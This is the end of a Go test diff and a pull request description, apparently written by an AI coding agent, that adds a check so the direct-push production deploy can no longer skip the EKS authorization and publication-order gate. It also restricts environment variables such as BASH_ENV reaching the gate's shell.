+	if err != nil {
+		t.Fatal(err)
+	}
+	deploy, ok := jobs["deploy-prod"].(map[string]any)
+	if !ok {
+		t.Fatal("CD workflow is missing the deploy-prod job")
+	}
+	if !stringListIncludes(deploy["needs"], "validate-eks-authorization") {
+		t.Error("CD deploy-prod must need validate-eks-authorization — the manual deploy " +
+			"path bypasses the EKS authorization gate that the merge-queue path cannot skip")
 	}
 }
 


### PR DESCRIPTION
> 🤖 Generated by the Agentic Engineer

## Why

Production has two routes. The merge-queue route runs the publication-order contract — publish to an immutable staging reference, sign and attest it, only then promote those bytes to `latest`. The documented direct-push recovery route never ran it, because that check lives in `ci.yaml` and `ci.yaml` only triggers on pull requests and the merge queue. So a change reaching `main` by direct push could be dispatched to production with the ordering never examined, and the merge-queue gate was the only thing enforcing it.

A gate one route can walk around is not a gate. It also caps what the recent analyzer hardening buys: the guarantee is only as strong as its weakest route to production.

## What

The direct-push workflow now runs the same contract check as a job the deploy waits on, so the deploy cannot execute without it. The validator additionally checks its own wiring, because that is the part that disappears quietly — dropping the dependency breaks no test and fails no lint, and leaves a workflow that still looks gated.

Proven by unwiring it and confirming the check refuses, then restoring it; plus five ablations, each removing one link in the chain.

Fixes #2879. Part of #2627.

## Operational note

The gate now refuses any environment variable reaching its shell, at workflow, job or step scope — that is how a variable like `BASH_ENV` or `PATH` can leave the gate looking correct while it runs nothing. Consequence for future edits: adding a **workflow-wide** `env:` to `cd.yaml` for some other job will now fail this check until the variable is named in the gate's allow-list. The failure says exactly which variable and where to add it.
